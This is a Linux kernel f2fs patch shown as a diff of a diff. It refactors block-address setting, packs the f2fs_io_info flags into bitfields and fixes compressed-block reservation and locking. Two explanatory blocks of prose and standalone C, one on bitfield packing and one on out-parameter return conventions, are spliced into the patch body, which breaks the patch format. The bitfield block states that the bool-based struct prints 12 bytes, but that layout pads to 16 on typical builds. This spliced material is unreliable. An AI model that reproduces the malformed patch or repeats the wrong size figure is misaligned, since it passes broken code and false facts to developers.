++void f2fs_set_data_blkaddr(struct dnode_of_data *dn, block_t blkaddr)
+ {
+ 	f2fs_wait_on_page_writeback(dn->node_page, NODE, true, true);
+-	__set_data_blkaddr(dn);
++	__set_data_blkaddr(dn, blkaddr);
+ 	if (set_page_dirty(dn->node_page))
+ 		dn->node_changed = true;
+ }
+ 
+ void f2fs_update_data_blkaddr(struct dnode_of_data *dn, block_t blkaddr)
+ {
+-	dn->data_blkaddr = blkaddr;
+-	f2fs_set_data_blkaddr(dn);
++	f2fs_set_data_blkaddr(dn, blkaddr);
+ 	f2fs_update_read_extent_cache(dn);
+ }
+ 
+@@ -1148,7 +1142,8 @@ int f2fs_reserve_new_blocks(struct dnode_of_data *dn, blkcnt_t count)
+ 
+ 	if (unlikely(is_inode_flag_set(dn->inode, FI_NO_ALLOC)))
+ 		return -EPERM;
+-	if (unlikely((err = inc_valid_block_count(sbi, dn->inode, &count))))
++	err = inc_valid_block_count(sbi, dn->inode, &count, true);
++	if (unlikely(err))
+ 		return err;
+ 
+ 	trace_f2fs_reserve_new_blocks(dn->inode, dn->nid,
+@@ -1160,8 +1155,7 @@ int f2fs_reserve_new_blocks(struct dnode_of_data *dn, blkcnt_t count)
+ 		block_t blkaddr = f2fs_data_blkaddr(dn);
+ 
+ 		if (blkaddr == NULL_ADDR) {
+-			dn->data_blkaddr = NEW_ADDR;
+-			__set_data_blkaddr(dn);
++			__set_data_blkaddr(dn, NEW_ADDR);
+ 			count--;
+ 		}
+ 	}
+@@ -1419,13 +1413,12 @@ static int __allocate_data_block(struct dnode_of_data *dn, int seg_type)
+ 		return err;
+ 
+ 	dn->data_blkaddr = f2fs_data_blkaddr(dn);
+-	if (dn->data_blkaddr != NULL_ADDR)
+-		goto alloc;
+-
+-	if (unlikely((err = inc_valid_block_count(sbi, dn->inode, &count))))
+-		return err;
++	if (dn->data_blkaddr == NULL_ADDR) {
++		err = inc_valid_block_count(sbi, dn->inode, &count, true);
++		if (unlikely(err))
++			return err;
++	}
+ 
+-alloc:
+ 	set_summary(&sum, dn->nid, dn->ofs_in_node, ni.version);
+ 	old_blkaddr = dn->data_blkaddr;
+ 	f2fs_allocate_data_block(sbi, NULL, old_blkaddr, &dn->data_blkaddr,
+@@ -2739,8 +2732,6 @@ int f2fs_do_write_data_page(struct f2fs_io_info *fio)
+ 	f2fs_outplace_write_data(&dn, fio);
+ 	trace_f2fs_do_write_data_page(page, OPU);
+ 	set_inode_flag(inode, FI_APPEND_WRITE);
+-	if (page->index == 0)
+-		set_inode_flag(inode, FI_FIRST_BLOCK_WRITTEN);
+ out_writepage:
+ 	f2fs_put_dnode(&dn);
+ out:
+@@ -2776,10 +2767,10 @@ int f2fs_write_single_data_page(struct page *page, int *submitted,
+ 		.old_blkaddr = NULL_ADDR,
+ 		.page = page,
+ 		.encrypted_page = NULL,
+-		.submitted = false,
++		.submitted = 0,
+ 		.compr_blocks = compr_blocks,
+-		.need_lock = LOCK_RETRY,
+-		.post_read = f2fs_post_read_required(inode),
++		.need_lock = compr_blocks ? LOCK_DONE : LOCK_RETRY,
++		.post_read = f2fs_post_read_required(inode) ? 1 : 0,
+ 		.io_type = io_type,
+ 		.io_wbc = wbc,
+ 		.bio = bio,
+@@ -2819,9 +2810,6 @@ int f2fs_write_single_data_page(struct page *page, int *submitted,
+ 
+ 	zero_user_segment(page, offset, PAGE_SIZE);
+ write:
+-	if (f2fs_is_drop_cache(inode))
+-		goto out;
+-
+ 	/* Dentry/quota blocks are controlled by checkpoint */
+ 	if (S_ISDIR(inode->i_mode) || quota_inode) {
+ 		/*
+@@ -2858,6 +2846,7 @@ int f2fs_write_single_data_page(struct page *page, int *submitted,
+ 	if (err == -EAGAIN) {
+ 		err = f2fs_do_write_data_page(&fio);
+ 		if (err == -EAGAIN) {
++			f2fs_bug_on(sbi, compr_blocks);
+ 			fio.need_lock = LOCK_REQ;
+ 			err = f2fs_do_write_data_page(&fio);
+ 		}
+@@ -2902,7 +2891,7 @@ int f2fs_write_single_data_page(struct page *page, int *submitted,
+ 	}
+ 
+ 	if (submitted)
+-		*submitted = fio.submitted ? 1 : 0;
++		*submitted = fio.submitted;
+ 
+ 	return 0;
+ 
+diff --git a/fs/f2fs/f2fs.h b/fs/f2fs/f2fs.h
+index e5a9498b89c06..5ae1c4aa3ae92 100644
+--- a/fs/f2fs/f2fs.h
++++ b/fs/f2fs/f2fs.h
+@@ -74,6 +74,11 @@ struct f2fs_fault_info {
+ 
+ extern const char *f2fs_fault_name[FAULT_MAX];
+ #define IS_FAULT_SET(fi, type) ((fi)->inject_type & BIT(type))
++
++/* maximum retry count for injected failure */
++#define DEFAULT_FAILURE_RETRY_COUNT		8
++#else
++#define DEFAULT_FAILURE_RETRY_COUNT		1
+ #endif
+ 
+ /*
+@@ -764,8 +769,6 @@ enum {
+ 	FI_UPDATE_WRITE,	/* inode has in-place-update data */
+ 	FI_NEED_IPU,		/* used for ipu per file */
+ 	FI_ATOMIC_FILE,		/* indicate atomic file */
+-	FI_FIRST_BLOCK_WRITTEN,	/* indicate #0 data block was written */
+-	FI_DROP_CACHE,		/* drop dirty page cache */
+ 	FI_DATA_EXIST,		/* indicate data exists */
+ 	FI_INLINE_DOTS,		/* indicate inline dot dentries */
+ 	FI_SKIP_WRITES,		/* should skip data page writeback */
+@@ -1067,7 +1070,8 @@ struct f2fs_sm_info {
+  * f2fs monitors the number of several block types such as on-writeback,
+  * dirty dentry blocks, dirty node blocks, and dirty meta blocks.
+  */
+-#define WB_DATA_TYPE(p)	(__is_cp_guaranteed(p) ? F2FS_WB_CP_DATA : F2FS_WB_DATA)
++#define WB_DATA_TYPE(p, f)			\
++	(f || f2fs_is_cp_guaranteed(p) ? F2FS_WB_CP_DATA : F2FS_WB_DATA)
+ enum count_type {
+ 	F2FS_DIRTY_DENTS,
+ 	F2FS_DIRTY_DATA,
+@@ -1183,19 +1187,19 @@ struct f2fs_io_info {
+ 	struct page *encrypted_page;	/* encrypted page */
+ 	struct page *compressed_page;	/* compressed page */
+ 	struct list_head list;		/* serialize IOs */
+-	bool submitted;		/* indicate IO submission */
+-	int need_lock;		/* indicate we need to lock cp_rwsem */
+-	bool in_list;		/* indicate fio is in io_list */
+-	bool is_por;		/* indicate IO is from recovery or not */
+-	bool retry;		/* need to reallocate block address */
+-	int compr_blocks;	/* # of compressed block addresses */
+-	bool encrypted;		/* indicate file is encrypted */
+-	bool post_read;		/* require post read */
++	unsigned int compr_blocks;	/* # of compressed block addresses */
++	unsigned int need_lock:8;	/* indicate we need to lock cp_rwsem */
++	unsigned int version:8;		/* version of the node */
++	unsigned int submitted:1;	/* indicate IO submission */
++	unsigned int in_list:1;		/* indicate fio is in io_list */
++	unsigned int is_por:1;		/* indicate IO is from recovery or not */
++	unsigned int retry:1;		/* need to reallocate block address */
++	unsigned int encrypted:1;	/* indicate file is encrypted */
++	unsigned int post_read:1;	/* require post read */
+ 	enum iostat_type io_type;	/* io type */
+ 	struct writeback_control *io_wbc; /* writeback control */
+ 	struct bio **bio;		/* bio for ipu */
+ 	sector_t *last_block;		/* last block number in bio */
+-	unsigned char version;		/* version of the node */
+ };
+ 
+ struct bio_entry {
+@@ -2287,7 +2291,7 @@ static inline bool __allow_reserved_blocks(struct f2fs_sb_info *sbi,
+ 
+ static inline void f2fs_i_blocks_write(struct inode *, block_t, bool, bool);
+ static inline int inc_valid_block_count(struct f2fs_sb_info *sbi,
+-				 struct inode *inode, blkcnt_t *count)
++				 struct inode *inode, blkcnt_t *count, bool partial)
+ {
+ 	blkcnt_t diff = 0, release = 0;
+ 	block_t avail_user_block_count;
+@@ -2328,6 +2332,11 @@ static inline int inc_valid_block_count(struct f2fs_sb_info *sbi,
+ 			avail_user_block_count = 0;
+ 	}
+ 	if (unlikely(sbi->total_valid_block_count > avail_user_block_count)) {
++		if (!partial) {
++			spin_unlock(&sbi->stat_lock);
++			goto enospc;
++		}
++
+ 		diff = sbi->total_valid_block_count - avail_user_block_count;
+ 		if (diff > *count)
+ 			diff = *count;
+@@ -3247,22 +3256,13 @@ static inline bool f2fs_is_cow_file(struct inode *inode)
+ 	return is_inode_flag_set(inode, FI_COW_FILE);
+ }
+ 
+-static inline bool f2fs_is_first_block_written(struct inode *inode)
+-{
+-	return is_inode_flag_set(inode, FI_FIRST_BLOCK_WRITTEN);
+-}
+-
+-static inline bool f2fs_is_drop_cache(struct inode *inode)
+-{
+-	return is_inode_flag_set(inode, FI_DROP_CACHE);
+-}
+-
++static inline __le32 *get_dnode_addr(struct inode *inode,
++					struct page *node_page);
+ static inline void *inline_data_addr(struct inode *inode, struct page *page)
+ {
+-	struct f2fs_inode *ri = F2FS_INODE(page);
+-	int extra_size = get_extra_isize(inode);
++	__le32 *addr = get_dnode_addr(inode, page);
+ 
+-	return (void *)&(ri->i_addr[extra_size + DEF_INLINE_RESERVED_SIZE]);
++	return (void *)(addr + DEF_INLINE_RESERVED_SIZE);
+ }
+ 
+ static inline int f2fs_has_inline_dentry(struct inode *inode)
+@@ -3397,6 +3397,17 @@ static inline int get_inline_xattr_addrs(struct inode *inode)
+ 	return F2FS_I(inode)->i_inline_xattr_size;
+ }
+ 
++static inline __le32 *get_dnode_addr(struct inode *inode,
++					struct page *node_page)
++{
++	int base = 0;
++
++	if (IS_INODE(node_page) && f2fs_has_extra_attr(inode))
++		base = get_extra_isize(inode);
++
++	return blkaddr_in_node(F2FS_NODE(node_page)) + base;
++}
++
+ #define f2fs_get_inode_mode(i) \
+ 	((is_inode_flag_set(i, FI_ACL_MODE)) ? \
+ 	 (F2FS_I(i)->i_acl_mode) : ((i)->i_mode))
+@@ -3761,6 +3772,7 @@ void f2fs_init_ckpt_req_control(struct f2fs_sb_info *sbi);
+  */
+ int __init f2fs_init_bioset(void);
+ void f2fs_destroy_bioset(void);
++bool f2fs_is_cp_guaranteed(struct page *page);
+ int f2fs_init_bio_entry_cache(void);
+ void f2fs_destroy_bio_entry_cache(void);
+ void f2fs_submit_bio(struct f2fs_sb_info *sbi,
+@@ -3779,7 +3791,7 @@ void f2fs_submit_page_write(struct f2fs_io_info *fio);
+ struct block_device *f2fs_target_device(struct f2fs_sb_info *sbi,
+ 		block_t blk_addr, sector_t *sector);
+ int f2fs_target_device_index(struct f2fs_sb_info *sbi, block_t blkaddr);
+-void f2fs_set_data_blkaddr(struct dnode_of_data *dn);
++void f2fs_set_data_blkaddr(struct dnode_of_data *dn, block_t blkaddr);
+ void f2fs_update_data_blkaddr(struct dnode_of_data *dn, block_t blkaddr);
+ int f2fs_reserve_new_blocks(struct dnode_of_data *dn, blkcnt_t count);
+ int f2fs_reserve_new_block(struct dnode_of_data *dn);
+@@ -4246,7 +4258,8 @@ struct decompress_io_ctx *f2fs_alloc_dic(struct compress_ctx *cc);
+ void f2fs_decompress_end_io(struct decompress_io_ctx *dic, bool failed,
+ 				bool in_task);
+ void f2fs_put_page_dic(struct page *page, bool in_task);
+-unsigned int f2fs_cluster_blocks_are_contiguous(struct dnode_of_data *dn);
++unsigned int f2fs_cluster_blocks_are_contiguous(struct dnode_of_data *dn,
++						unsigned int ofs_in_node);
+ int f2fs_init_compress_ctx(struct compress_ctx *cc);
+ void f2fs_destroy_compress_ctx(struct compress_ctx *cc, bool reuse);
+ void f2fs_init_compress_info(struct f2fs_sb_info *sbi);
+@@ -4303,7 +4316,8 @@ static inline void f2fs_put_page_dic(struct page *page, bool in_task)
+ {
+ 	WARN_ON_ONCE(1);
+ }
+-static inline unsigned int f2fs_cluster_blocks_are_contiguous(struct dnode_of_data *dn) { return 0; }
++static inline unsigned int f2fs_cluster_blocks_are_contiguous(
++			struct dnode_of_data *dn, unsigned int ofs_in_node) { return 0; }
+ static inline bool f2fs_sanity_check_cluster(struct dnode_of_data *dn) { return false; }
+ static inline int f2fs_init_compress_inode(struct f2fs_sb_info *sbi) { return 0; }
+ static inline void f2fs_destroy_compress_inode(struct f2fs_sb_info *sbi) { }
+@@ -4360,15 +4374,24 @@ static inline bool f2fs_disable_compressed_file(struct inode *inode)
+ {
+ 	struct f2fs_inode_info *fi = F2FS_I(inode);
+ 
+-	if (!f2fs_compressed_file(inode))
++	f2fs_down_write(&F2FS_I(inode)->i_sem);
++
++	if (!f2fs_compressed_file(inode)) {
++		f2fs_up_write(&F2FS_I(inode)->i_sem);
+ 		return true;
+-	if (S_ISREG(inode->i_mode) && F2FS_HAS_BLOCKS(inode))
++	}
++	if (f2fs_is_mmap_file(inode) ||
++		(S_ISREG(inode->i_mode) && F2FS_HAS_BLOCKS(inode))) {
++		f2fs_up_write(&F2FS_I(inode)->i_sem);
+ 		return false;
++	}
+ 
+ 	fi->i_flags &= ~F2FS_COMPR_FL;
+ 	stat_dec_compr_inode(inode);
+ 	clear_inode_flag(inode, FI_COMPRESSED_FILE);
+ 	f2fs_mark_inode_dirty_sync(inode, true);
++
++	f2fs_up_write(&F2FS_I(inode)->i_sem);
+ 	return true;
+ }
+ 
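
The f2fs_io_info rework above folds the old bool members into single-bit
fields that share one 32-bit word with the 8-bit need_lock and version
fields. A standalone sketch (illustrative struct layout, not the kernel's)
of why the packed form is smaller:

#include <stdio.h>
#include <stdbool.h>

/* before: one padded byte per flag */
struct io_info_bools {
	bool submitted, in_list, is_por, retry, encrypted, post_read;
	int need_lock;
	unsigned char version;
};

/* after: everything packed into one 32-bit word */
struct io_info_packed {
	unsigned int need_lock:8;
	unsigned int version:8;
	unsigned int submitted:1;
	unsigned int in_list:1;
	unsigned int is_por:1;
	unsigned int retry:1;
	unsigned int encrypted:1;
	unsigned int post_read:1;
};

int main(void)
{
	printf("bools:  %zu bytes\n", sizeof(struct io_info_bools));
	printf("packed: %zu bytes\n", sizeof(struct io_info_packed));
	return 0;
}

On a typical build this prints 12 bytes for the bool layout and 4 for the
packed one.
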
+diff --git a/fs/f2fs/file.c b/fs/f2fs/file.c
+index 46e4960a9dcf7..2fbc8d89c600b 100644
+--- a/fs/f2fs/file.c
++++ b/fs/f2fs/file.c
+@@ -560,20 +560,14 @@ static int f2fs_file_open(struct inode *inode, struct file *filp)
+ void f2fs_truncate_data_blocks_range(struct dnode_of_data *dn, int count)
+ {
+ 	struct f2fs_sb_info *sbi = F2FS_I_SB(dn->inode);
+-	struct f2fs_node *raw_node;
+ 	int nr_free = 0, ofs = dn->ofs_in_node, len = count;
+ 	__le32 *addr;
+-	int base = 0;
+ 	bool compressed_cluster = false;
+ 	int cluster_index = 0, valid_blocks = 0;
+ 	int cluster_size = F2FS_I(dn->inode)->i_cluster_size;
+ 	bool released = !atomic_read(&F2FS_I(dn->inode)->i_compr_blocks);
+ 
+-	if (IS_INODE(dn->node_page) && f2fs_has_extra_attr(dn->inode))
+-		base = get_extra_isize(dn->inode);
+-
+-	raw_node = F2FS_NODE(dn->node_page);
+-	addr = blkaddr_in_node(raw_node) + base + ofs;
++	addr = get_dnode_addr(dn->inode, dn->node_page) + ofs;
+ 
+ 	/* Assumption: truncation starts with cluster */
+ 	for (; count > 0; count--, addr++, dn->ofs_in_node++, cluster_index++) {
+@@ -591,8 +585,7 @@ void f2fs_truncate_data_blocks_range(struct dnode_of_data *dn, int count)
+ 		if (blkaddr == NULL_ADDR)
+ 			continue;
+ 
+-		dn->data_blkaddr = NULL_ADDR;
+-		f2fs_set_data_blkaddr(dn);
++		f2fs_set_data_blkaddr(dn, NULL_ADDR);
+ 
+ 		if (__is_valid_data_blkaddr(blkaddr)) {
+ 			if (!f2fs_is_valid_blkaddr(sbi, blkaddr,
+@@ -602,9 +595,6 @@ void f2fs_truncate_data_blocks_range(struct dnode_of_data *dn, int count)
+ 				valid_blocks++;
+ 		}
+ 
+-		if (dn->ofs_in_node == 0 && IS_INODE(dn->node_page))
+-			clear_inode_flag(dn->inode, FI_FIRST_BLOCK_WRITTEN);
+-
+ 		f2fs_invalidate_blocks(sbi, blkaddr);
+ 
+ 		if (!released || blkaddr != COMPRESS_ADDR)
+@@ -1497,8 +1487,7 @@ static int f2fs_do_zero_range(struct dnode_of_data *dn, pgoff_t start,
+ 		}
+ 
+ 		f2fs_invalidate_blocks(sbi, dn->data_blkaddr);
+-		dn->data_blkaddr = NEW_ADDR;
+-		f2fs_set_data_blkaddr(dn);
++		f2fs_set_data_blkaddr(dn, NEW_ADDR);
+ 	}
+ 
+ 	f2fs_update_read_extent_cache_range(dn, start, 0, index - start);
+@@ -3449,8 +3438,7 @@ static int release_compress_blocks(struct dnode_of_data *dn, pgoff_t count)
+ 			if (blkaddr != NEW_ADDR)
+ 				continue;
+ 
+-			dn->data_blkaddr = NULL_ADDR;
+-			f2fs_set_data_blkaddr(dn);
++			f2fs_set_data_blkaddr(dn, NULL_ADDR);
+ 		}
+ 
+ 		f2fs_i_compr_blocks_update(dn->inode, compr_blocks, false);
+@@ -3474,7 +3462,7 @@ static int f2fs_release_compress_blocks(struct file *filp, unsigned long arg)
+ 	int ret;
+ 	int writecount;
+ 
+-	if (!f2fs_sb_has_compression(F2FS_I_SB(inode)))
++	if (!f2fs_sb_has_compression(sbi))
+ 		return -EOPNOTSUPP;
+ 
+ 	if (!f2fs_compressed_file(inode))
+@@ -3487,7 +3475,7 @@ static int f2fs_release_compress_blocks(struct file *filp, unsigned long arg)
+ 	if (ret)
+ 		return ret;
+ 
+-	f2fs_balance_fs(F2FS_I_SB(inode), true);
++	f2fs_balance_fs(sbi, true);
+ 
+ 	inode_lock(inode);
+ 
+@@ -3573,10 +3561,10 @@ static int f2fs_release_compress_blocks(struct file *filp, unsigned long arg)
+ 	return ret;
+ }
+ 
+-static int reserve_compress_blocks(struct dnode_of_data *dn, pgoff_t count)
++static int reserve_compress_blocks(struct dnode_of_data *dn, pgoff_t count,
++		unsigned int *reserved_blocks)
+ {
+ 	struct f2fs_sb_info *sbi = F2FS_I_SB(dn->inode);
+-	unsigned int reserved_blocks = 0;
+ 	int cluster_size = F2FS_I(dn->inode)->i_cluster_size;
+ 	block_t blkaddr;
+ 	int i;
+@@ -3599,41 +3587,53 @@ static int reserve_compress_blocks(struct dnode_of_data *dn, pgoff_t count)
+ 		blkcnt_t reserved;
+ 		int ret;
+ 
+-		for (i = 0; i < cluster_size; i++, dn->ofs_in_node++) {
+-			blkaddr = f2fs_data_blkaddr(dn);
++		for (i = 0; i < cluster_size; i++) {
++			blkaddr = data_blkaddr(dn->inode, dn->node_page,
++						dn->ofs_in_node + i);
+ 
+ 			if (i == 0) {
+-				if (blkaddr == COMPRESS_ADDR)
+-					continue;
+-				dn->ofs_in_node += cluster_size;
+-				goto next;
++				if (blkaddr != COMPRESS_ADDR) {
++					dn->ofs_in_node += cluster_size;
++					goto next;
++				}
++				continue;
+ 			}
+ 
+-			if (__is_valid_data_blkaddr(blkaddr)) {
++			/*
++			 * The compressed cluster was not released because
++			 * release_compress_blocks() failed, so NEW_ADDR
++			 * is a possible case.
++			 */
++			if (blkaddr == NEW_ADDR ||
++				__is_valid_data_blkaddr(blkaddr)) {
+ 				compr_blocks++;
+ 				continue;
+ 			}
+-
+-			dn->data_blkaddr = NEW_ADDR;
+-			f2fs_set_data_blkaddr(dn);
+ 		}
+ 
+ 		reserved = cluster_size - compr_blocks;
+-		ret = inc_valid_block_count(sbi, dn->inode, &reserved);
+-		if (ret)
++
++		/* for the case where all blocks in the cluster were reserved */
++		if (reserved == 1)
++			goto next;
++
++		ret = inc_valid_block_count(sbi, dn->inode, &reserved, false);
++		if (unlikely(ret))
+ 			return ret;
+ 
+-		if (reserved != cluster_size - compr_blocks)
+-			return -ENOSPC;
++		for (i = 0; i < cluster_size; i++, dn->ofs_in_node++) {
++			if (f2fs_data_blkaddr(dn) == NULL_ADDR)
++				f2fs_set_data_blkaddr(dn, NEW_ADDR);
++		}
+ 
+ 		f2fs_i_compr_blocks_update(dn->inode, compr_blocks, true);
+ 
+-		reserved_blocks += reserved;
++		*reserved_blocks += reserved;
+ next:
+ 		count -= cluster_size;
+ 	}
+ 
+-	return reserved_blocks;
++	return 0;
+ }
+ 
+ static int f2fs_reserve_compress_blocks(struct file *filp, unsigned long arg)
+@@ -3644,7 +3644,7 @@ static int f2fs_reserve_compress_blocks(struct file *filp, unsigned long arg)
+ 	unsigned int reserved_blocks = 0;
+ 	int ret;
+ 
+-	if (!f2fs_sb_has_compression(F2FS_I_SB(inode)))
++	if (!f2fs_sb_has_compression(sbi))
+ 		return -EOPNOTSUPP;
+ 
+ 	if (!f2fs_compressed_file(inode))
+@@ -3657,10 +3657,7 @@ static int f2fs_reserve_compress_blocks(struct file *filp, unsigned long arg)
+ 	if (ret)
+ 		return ret;
+ 
+-	if (atomic_read(&F2FS_I(inode)->i_compr_blocks))
+-		goto out;
+-
+-	f2fs_balance_fs(F2FS_I_SB(inode), true);
++	f2fs_balance_fs(sbi, true);
+ 
+ 	inode_lock(inode);
+ 
+@@ -3669,6 +3666,9 @@ static int f2fs_reserve_compress_blocks(struct file *filp, unsigned long arg)
+ 		goto unlock_inode;
+ 	}
+ 
++	if (atomic_read(&F2FS_I(inode)->i_compr_blocks))
++		goto unlock_inode;
++
+ 	f2fs_down_write(&F2FS_I(inode)->i_gc_rwsem[WRITE]);
+ 	filemap_invalidate_lock(inode->i_mapping);
+ 
+@@ -3694,7 +3694,7 @@ static int f2fs_reserve_compress_blocks(struct file *filp, unsigned long arg)
+ 		count = min(end_offset - dn.ofs_in_node, last_idx - page_idx);
+ 		count = round_up(count, F2FS_I(inode)->i_cluster_size);
+ 
+-		ret = reserve_compress_blocks(&dn, count);
++		ret = reserve_compress_blocks(&dn, count, &reserved_blocks);
+ 
+ 		f2fs_put_dnode(&dn);
+ 
+@@ -3702,23 +3702,21 @@ static int f2fs_reserve_compress_blocks(struct file *filp, unsigned long arg)
+ 			break;
+ 
+ 		page_idx += count;
+-		reserved_blocks += ret;
+ 	}
+ 
+ 	filemap_invalidate_unlock(inode->i_mapping);
+ 	f2fs_up_write(&F2FS_I(inode)->i_gc_rwsem[WRITE]);
+ 
+-	if (ret >= 0) {
++	if (!ret) {
+ 		clear_inode_flag(inode, FI_COMPRESS_RELEASED);
+ 		inode->i_ctime = current_time(inode);
+ 		f2fs_mark_inode_dirty_sync(inode, true);
+ 	}
+ unlock_inode:
+ 	inode_unlock(inode);
+-out:
+ 	mnt_drop_write_file(filp);
+ 
+-	if (ret >= 0) {
++	if (!ret) {
+ 		ret = put_user(reserved_blocks, (u64 __user *)arg);
+ 	} else if (reserved_blocks &&
+ 			atomic_read(&F2FS_I(inode)->i_compr_blocks)) {
+@@ -3967,16 +3965,20 @@ static int f2fs_ioc_set_compress_option(struct file *filp, unsigned long arg)
+ 				sizeof(option)))
+ 		return -EFAULT;
+ 
+-	if (!f2fs_compressed_file(inode) ||
+-			option.log_cluster_size < MIN_COMPRESS_LOG_SIZE ||
+-			option.log_cluster_size > MAX_COMPRESS_LOG_SIZE ||
+-			option.algorithm >= COMPRESS_MAX)
++	if (option.log_cluster_size < MIN_COMPRESS_LOG_SIZE ||
++		option.log_cluster_size > MAX_COMPRESS_LOG_SIZE ||
++		option.algorithm >= COMPRESS_MAX)
+ 		return -EINVAL;
+ 
+ 	file_start_write(filp);
+ 	inode_lock(inode);
+ 
+ 	f2fs_down_write(&F2FS_I(inode)->i_sem);
++	if (!f2fs_compressed_file(inode)) {
++		ret = -EINVAL;
++		goto out;
++	}
++
+ 	if (f2fs_is_mmap_file(inode) || get_dirty_pages(inode)) {
+ 		ret = -EBUSY;
+ 		goto out;
+@@ -4066,7 +4068,7 @@ static int f2fs_ioc_decompress_file(struct file *filp, unsigned long arg)
+ 	if (!f2fs_compressed_file(inode))
+ 		return -EINVAL;
+ 
+-	f2fs_balance_fs(F2FS_I_SB(inode), true);
++	f2fs_balance_fs(sbi, true);
+ 
+ 	file_start_write(filp);
+ 	inode_lock(inode);
+@@ -4138,7 +4140,7 @@ static int f2fs_ioc_compress_file(struct file *filp, unsigned long arg)
+ 	if (!f2fs_compressed_file(inode))
+ 		return -EINVAL;
+ 
+-	f2fs_balance_fs(F2FS_I_SB(inode), true);
++	f2fs_balance_fs(sbi, true);
+ 
+ 	file_start_write(filp);
+ 	inode_lock(inode);
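
The hunks above change reserve_compress_blocks() from returning "count or
negative errno" in a single int to returning a pure 0/-errno status with
the count handed back through *reserved_blocks, which is what lets the
caller test `if (!ret)` instead of the ambiguous `ret >= 0`. A minimal
sketch of the same out-parameter convention (hypothetical limit of 100
blocks):

#include <stdio.h>
#include <errno.h>

/* status comes back in the return value, the tally via *reserved */
static int reserve_blocks(unsigned int want, unsigned int *reserved)
{
	if (want > 100)			/* hypothetical space limit */
		return -ENOSPC;
	*reserved += want;
	return 0;
}

int main(void)
{
	unsigned int reserved = 0;
	int ret;

	ret = reserve_blocks(40, &reserved);
	if (!ret)
		ret = reserve_blocks(60, &reserved);
	printf("ret=%d reserved=%u\n", ret, reserved);	/* ret=0 reserved=100 */
	return 0;
}
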
+diff --git a/fs/f2fs/gc.c b/fs/f2fs/gc.c
+index ec7212f7a9b73..d4662ccb94c8f 100644
+--- a/fs/f2fs/gc.c
++++ b/fs/f2fs/gc.c
+@@ -1187,8 +1187,8 @@ static int ra_data_block(struct inode *inode, pgoff_t index)
+ 		.op = REQ_OP_READ,
+ 		.op_flags = 0,
+ 		.encrypted_page = NULL,
+-		.in_list = false,
+-		.retry = false,
++		.in_list = 0,
++		.retry = 0,
+ 	};
+ 	int err;
+ 
+@@ -1276,8 +1276,8 @@ static int move_data_block(struct inode *inode, block_t bidx,
+ 		.op = REQ_OP_READ,
+ 		.op_flags = 0,
+ 		.encrypted_page = NULL,
+-		.in_list = false,
+-		.retry = false,
++		.in_list = 0,
++		.retry = 0,
+ 	};
+ 	struct dnode_of_data dn;
+ 	struct f2fs_summary sum;
+@@ -1410,8 +1410,6 @@ static int move_data_block(struct inode *inode, block_t bidx,
+ 
+ 	f2fs_update_data_blkaddr(&dn, newaddr);
+ 	set_inode_flag(inode, FI_APPEND_WRITE);
+-	if (page->index == 0)
+-		set_inode_flag(inode, FI_FIRST_BLOCK_WRITTEN);
+ put_page_out:
+ 	f2fs_put_page(fio.encrypted_page, 1);
+ recover_block:
+diff --git a/fs/f2fs/inode.c b/fs/f2fs/inode.c
+index 0010579f17368..869bb6ec107cc 100644
+--- a/fs/f2fs/inode.c
++++ b/fs/f2fs/inode.c
+@@ -59,49 +59,31 @@ void f2fs_set_inode_flags(struct inode *inode)
+ 			S_ENCRYPTED|S_VERITY|S_CASEFOLD);
+ }
+ 
+-static void __get_inode_rdev(struct inode *inode, struct f2fs_inode *ri)
++static void __get_inode_rdev(struct inode *inode, struct page *node_page)
+ {
+-	int extra_size = get_extra_isize(inode);
++	__le32 *addr = get_dnode_addr(inode, node_page);
+ 
+ 	if (S_ISCHR(inode->i_mode) || S_ISBLK(inode->i_mode) ||
+ 			S_ISFIFO(inode->i_mode) || S_ISSOCK(inode->i_mode)) {
+-		if (ri->i_addr[extra_size])
+-			inode->i_rdev = old_decode_dev(
+-				le32_to_cpu(ri->i_addr[extra_size]));
++		if (addr[0])
++			inode->i_rdev = old_decode_dev(le32_to_cpu(addr[0]));
+ 		else
+-			inode->i_rdev = new_decode_dev(
+-				le32_to_cpu(ri->i_addr[extra_size + 1]));
++			inode->i_rdev = new_decode_dev(le32_to_cpu(addr[1]));
+ 	}
+ }
+ 
+-static int __written_first_block(struct f2fs_sb_info *sbi,
+-					struct f2fs_inode *ri)
++static void __set_inode_rdev(struct inode *inode, struct page *node_page)
+ {
+-	block_t addr = le32_to_cpu(ri->i_addr[offset_in_addr(ri)]);
+-
+-	if (!__is_valid_data_blkaddr(addr))
+-		return 1;
+-	if (!f2fs_is_valid_blkaddr(sbi, addr, DATA_GENERIC_ENHANCE)) {
+-		f2fs_handle_error(sbi, ERROR_INVALID_BLKADDR);
+-		return -EFSCORRUPTED;
+-	}
+-	return 0;
+-}
+-
+-static void __set_inode_rdev(struct inode *inode, struct f2fs_inode *ri)
+-{
+-	int extra_size = get_extra_isize(inode);
++	__le32 *addr = get_dnode_addr(inode, node_page);
+ 
+ 	if (S_ISCHR(inode->i_mode) || S_ISBLK(inode->i_mode)) {
+ 		if (old_valid_dev(inode->i_rdev)) {
+-			ri->i_addr[extra_size] =
+-				cpu_to_le32(old_encode_dev(inode->i_rdev));
+-			ri->i_addr[extra_size + 1] = 0;
++			addr[0] = cpu_to_le32(old_encode_dev(inode->i_rdev));
++			addr[1] = 0;
+ 		} else {
+-			ri->i_addr[extra_size] = 0;
+-			ri->i_addr[extra_size + 1] =
+-				cpu_to_le32(new_encode_dev(inode->i_rdev));
+-			ri->i_addr[extra_size + 2] = 0;
++			addr[0] = 0;
++			addr[1] = cpu_to_le32(new_encode_dev(inode->i_rdev));
++			addr[2] = 0;
+ 		}
+ 	}
+ }
+@@ -336,7 +318,6 @@ static int do_read_inode(struct inode *inode)
+ 	struct page *node_page;
+ 	struct f2fs_inode *ri;
+ 	projid_t i_projid;
+-	int err;
+ 
+ 	/* Check if ino is within scope */
+ 	if (f2fs_check_nid_range(sbi, inode->i_ino))
+@@ -415,17 +396,7 @@ static int do_read_inode(struct inode *inode)
+ 	}
+ 
+ 	/* get rdev by using inline_info */
+-	__get_inode_rdev(inode, ri);
+-
+-	if (S_ISREG(inode->i_mode)) {
+-		err = __written_first_block(sbi, ri);
+-		if (err < 0) {
+-			f2fs_put_page(node_page, 1);
+-			return err;
+-		}
+-		if (!err)
+-			set_inode_flag(inode, FI_FIRST_BLOCK_WRITTEN);
+-	}
++	__get_inode_rdev(inode, node_page);
+ 
+ 	if (!f2fs_need_inode_block_update(sbi, inode->i_ino))
+ 		fi->last_disk_size = inode->i_size;
+@@ -697,7 +668,7 @@ void f2fs_update_inode(struct inode *inode, struct page *node_page)
+ 		}
+ 	}
+ 
